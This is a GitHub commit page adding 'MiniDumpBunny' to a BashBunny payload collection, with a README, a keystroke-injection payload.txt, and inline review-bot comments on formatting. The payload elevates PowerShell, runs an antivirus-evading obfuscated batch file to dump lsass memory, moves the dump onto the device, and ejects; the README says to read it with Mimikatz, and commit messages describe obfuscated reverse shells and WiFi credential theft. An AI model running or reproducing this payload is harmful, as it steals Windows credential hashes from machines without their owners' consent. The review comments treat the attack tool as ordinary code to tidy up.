Uploaded MiniDumpBunny (#503)

* Uploaded ReverseBunny

Obfuscated reverse shell via PowerShell

* Uploaded WifiSnatch

Get your targets stored wifi information and credentials, store them on your Bashbunny and hop away 🐇

* Update ReverseBunny.txt

Changed payload to evade Windows Defender

* Update payload.txt

Added new "Eject Method" - props to Night(9o3)

* Update README.md

* Deleted ReverseBunny.txt

Deleted because of higher risk to get caught by AV

* Updated ReverseBunny to version 1.2

Updated ReverseBunny to version 1.2.
- Deleted payload on disk because of AV
- Added custom shell design

* Updated ReverseBunny to version 1.2

Updated README for ReverseBunny update

* Updated payload

Fixed some stupid leftovers <3

* Uploaded pingUinBunny

A reverse shell using ICMP

* Delete payloads/library/remote_access/switch1 directory

* Uploaded pingUinBunny

A reverse shell using ICMP

* Update README.md

* Update README.md

* Updated to PingZhell

* Update Bunny.pl

* Update README.md

* Update README.md

* Update payload.txt

* Rename payloads/library/remote_access/pingUinBunny/Bunny.pl to payloads/library/remote_access/PingZhellBunny/Bunny.pl

* Rename payloads/library/remote_access/pingUinBunny/PingZhell.ps1 to payloads/library/remote_access/PingZhellBunny/PingZhell.ps1

* Rename payloads/library/remote_access/pingUinBunny/README.md to payloads/library/remote_access/PingZhellBunny/README.md

* Rename payloads/library/remote_access/pingUinBunny/payload.txt to payloads/library/remote_access/PingZhellBunny/payload.txt

* Update payload.txt

* Update README.md

* Update README.md

* Update Bunny.pl

* Created ProcDumpBunny

Dump lsass.exe with a renamed version of ProcDump and get the users' hashes with Mimikatz

* Update README.md

* Update payload.txt

* Updated ReverseBunny

Fixed wrong DELAY commands

* Updated PingZhellBunny

Fixed wrong DELAY commands

* Updated WifiSnatch

Fixed multiple mistakes

* Uploaded HashDumpBunny

Use your BashBunny to dump the user hashes of your target - similar to the msf post-module.
The script was obfuscated with multiple layers, so don't be confused.
If you don't trust this script, run it within a safe testing space - which should be best practice anyways ;)

* added example picture

* Update README.md

* Uploaded SessionBunny

Utilize SessionGopher (slightly modified) to find PuTTY, WinSCP, and Remote Desktop saved sessions. It decrypts saved passwords for WinSCP.
Extracts FileZilla, SuperPuTTY's saved session information in the sitemanager.xml file and decodes saved passwords.

Afterwards decide which is important and what you want to save onto your BashBunny.

* Uploaded SessionBunny

Utilize the famous SessionGopher script (slightly modified here) to find PuTTY, WinSCP, and Remote Desktop saved sessions. It decrypts saved passwords for WinSCP.
Extracts FileZilla, SuperPuTTY's saved session information in the sitemanager.xml file and decodes saved passwords.

Decide which information you wanna take with you - save it onto your BashBunny!

* Update README.md

* Delete SessionBunny directory

* Uploaded MiniDumpBunny

Dump lsass with this rewritten version of PowerSploit's Out-MiniDump, adapted for the BashBunny.
0iphor13 2022-03-14 15:25:29 +01:00 committed by GitHub
parent 2e297ba861
commit 6bacea8bc8
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
4 changed files with 62 additions and 0 deletions


@ -0,0 +1,2 @@
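Review bot: this file cannot be audited from the diff: it renders as mojibake, which means it was committed in a non-UTF-8 (two-byte) encoding, and its whole content appears to be a single long encoded command line, so a reviewer sees neither readable source nor a statement of what it does. Commit the readable script it was generated from (or at minimum a comment saying what it runs and where it writes its output) and save the file as UTF-8 so the diff becomes reviewable; the README describes this file only as "obfuscated in multiple ways", which is precisely the property that prevents review.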


@ -0,0 +1,17 @@
**Title: MiniDumpBunny**
Author: 0iphor13
Version: 1.0
What is MiniDumpBunny?
#
*MiniDumpBunny uses Powersploits Out-MiniDump script to dump lsass. The script was rewritten, adapted for BashBunny usage and obfuscated in multiple ways to evade Antivirus.*
#
**Instruction:**
Plug in your BashBunny equipped with the obfuscated MiniBunny.bat file, wait a few seconds, go away.
#
Exfiltrate the .dmp file and read it with Mimikatz.
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/MiniDumpBunny/mimi.png)
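Review bot: the three bare `#` lines (after "What is MiniDumpBunny?", after the description, and after the instruction line) are Markdown headings with no text and render as empty heading blocks; use a horizontal rule (`---`) or plain blank lines if a separator is wanted. The instruction "Plug in your BashBunny equipped with the obfuscated MiniBunny.bat file" also never says where that file has to be placed or which keyboard layout the payload assumes: payload.txt in this same commit loads it from `\payloads\<switch position>\MiniBunny.bat`, sets `DUCKY_LANG de`, and moves the resulting `.dmp` into `\loot` on the Bunny, and all three are prerequisites the README should state.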

Binary file not shown (60 KiB).


@ -0,0 +1,43 @@
#!/bin/bash
#
# Title: MiniDumpBunny
# Description: Dump lsass with this script, which was obfuscated with multiple layers.
# Author: 0iphor13
# Version: 1.0
# Category: Credentials
# Attackmodes: HID, Storage
LED SETUP
Q DELAY 500
GET SWITCH_POSITION
DUCKY_LANG de
Q DELAY 500
ATTACKMODE HID STORAGE
#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING
LED STAGE1
Q DELAY 1000
RUN WIN "powershell Start-Process powershell -Verb runAs"
Q ENTER
Q DELAY 1000
Q ALT j
Q DELAY 250
Q DELAY 250
Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\MiniBunny.bat')"
Q DELAY 250
Q STRING " ;mv *.dmp ((gwmi win32_volume -f 'label=''BashBunny''').Name+'\loot');\$bb = (gwmi win32_volume -f 'l"
Q DELAY 250
Q STRING "abel=''BashBunny''').Name;Start-Sleep 1;New-Item -ItemType file \$bb'DONE';(New-Object -comObject Shell.Application).Nam"
Q DELAY 250
Q STRING "espace(17).ParseName(\$bb).InvokeVerb('Eject');Start-Sleep -s 5;Exit"
Q DELAY 300
Q ENTER
LED FINISH
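Review bot: the two consecutive `Q DELAY 250` lines directly after `Q ALT j` look like an editing leftover rather than intent; either collapse them into one delay or comment why the split is needed. Two further points for the header comment: the payload is hard-wired to a German layout (`DUCKY_LANG de`, and `ALT j` is the German answer to the elevation prompt), which the Description line does not mention, and the mixed escaping in the `Q STRING` lines (`\\$SWITCH_POSITION`, expanded by the Bunny's shell, versus `\$bb`, kept literal so PowerShell sees `$bb`) is easy to break on a future edit and deserves a one-line comment explaining which side of the string each variable is resolved on.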